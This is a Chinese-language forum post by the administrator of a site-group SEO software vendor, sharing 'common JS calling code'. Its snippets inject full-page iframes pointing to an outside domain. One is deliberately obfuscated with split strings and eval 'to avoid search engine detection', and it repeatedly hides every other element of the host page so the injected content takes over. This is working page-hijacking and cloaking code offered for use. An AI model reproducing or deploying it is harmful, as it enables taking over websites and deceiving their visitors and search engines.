找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
售后投诉-点我祝贺本站成立6周年,赠送站群seo全套工具包
购买软件必看VS销售客服必看守则
查看: 5449|回复: 0

常用js调用代码

[复制链接]

357

主题

145

回帖

2879

积分

管理员

积分
2879
发表于 2014-4-10 21:46:39 | 显示全部楼层 |阅读模式
网页调用代码:
  1. <script language="JavaScript" src="/hx.js" type="text/javascript"></script>
复制代码



上面是广告下面是站群的代码
  1. document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='5350' allowTransparency src=http://www.hxzhanqun.com/></iframe>");
复制代码


全部覆盖的代码
  1. document.write("</iframe><iframe src='http://www.*****.com/' rel='nofollow' scrolling='no' frameborder='0' width='100%'  height='2000'>");
复制代码

混淆防止搜索引擎被查,js调用(上面是广告下面是站群的代码)
  1. var  ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0  frameborder="0" width="100%" width="14'+'00" height="63'+'50" src="ht'+'tp://'+'ww'+'w.hx'+'zhan'+'qun.c'+'om/"></iframe></center>';
  2. eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');");
  3.         
  4. try{
  5.         setInterval(function(){

  6.                 try{
  7.                         document.getElementById("div"+"All").style.display="no"+"ne";
  8.                 }catch(e){}

  9.                 for(var i=0;i<document.body.children.length;i++){
  10.                         try{
  11.                                 var tagname = document.body.children[i].tagName;
  12.                                 var myid = document.body.children[i].id;
  13.                                 if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){
  14.                                   // if(tagname!="center"){
  15.                                      document.body.children[i].style.display="non"+"e";
  16.                                    //}
  17.                                 }
  18.                         }catch(e){}
  19.                 }

  20.         },100);
  21. }catch(e){}
复制代码



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则



手机版|泛目录站群

GMT+8, 2024-4-26 05:57 , Processed in 0.159993 second(s), 21 queries .

Powered by 泛站群 X3.5

© 2001-2028 黑侠泛站群官方网站

快速回复 返回顶部 返回列表